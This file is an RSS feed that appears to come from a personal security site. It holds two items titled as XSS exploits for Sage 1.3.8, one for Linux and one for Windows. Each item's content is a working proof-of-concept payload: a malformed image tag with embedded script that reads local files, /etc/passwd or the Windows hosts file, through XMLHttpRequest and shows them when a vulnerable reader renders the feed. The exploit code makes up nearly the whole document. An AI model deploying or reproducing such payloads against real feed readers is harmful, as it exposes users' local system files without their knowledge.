<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Operation n - michaeldaw.org</title>
	<link>http://michaeldaw.org</link>
	<description>The Adventures of Michael Daw</description>

		<item>
		<title>Linux Sage 1.3.8 XSS Exploit</title>

			<content:encoded><![CDATA[


<img src="http://michaeldaw.org/images/jss.jpg" 

<script>

try {
var req = new XMLHttpRequest();
req.open("GET", "file:///etc/passwd", null);
req.send(null); alert(req.responseText) } catch (e) {};

</script> 

alt="test">Sage XSS Vulnerability.</img>


]]>

</content:encoded>


		</item>
<title>Operation n - michaeldaw.org</title>
        <link>http://michaeldaw.org</link>
        <description>The Adventures of Michael Daw</description>

                <item>
                <title>Windows Sage 1.3.8 XSS Exploit</title>

                        <content:encoded><![CDATA[


<img src="http://michaeldaw.org/images/jss.jpg"

<script>
alert('blah');

try {
var req = new XMLHttpRequest();
req.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts", null);
req.send(null); alert(req.responseText) } catch (e) {};

</script>

alt="test">Sage XSS Vulnerability.</img>


]]>

</content:encoded>


                </item>


	</channel>
</rss>

